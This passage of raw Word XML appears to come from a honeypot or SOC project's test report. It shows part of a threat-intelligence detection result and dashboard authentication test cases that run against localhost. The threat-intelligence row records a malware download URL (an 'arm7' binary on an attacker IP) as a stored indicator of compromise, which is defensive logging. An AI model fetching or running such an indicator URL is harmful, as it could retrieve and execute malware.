                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">url http://198.51.100.23/arm7, ipv4 198.51.100.23 and attacker IPs stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="1532631"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_engine.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1532631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">37</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Detection Pass of the Threat Intelligence Engine (one attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9044" w:name="_Toc69044"/>
      <w:r>
        <w:t xml:space="preserve">SOC Dashboard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9044"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the SOC dashboard served by Nginx on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Dashboard Test Cases</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the dashboard requires authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running (Windows, Docker Desktop)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Open http://localhost/ with a wrong password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">401 and login prompt again</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Nginx log: user "admin": password mismatch, 401</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify login and page load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">htpasswd created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Open http://localhost/ with correct password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / &lt;password&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Dashboard page loads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200 in 0.034 s; dashboard rendered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
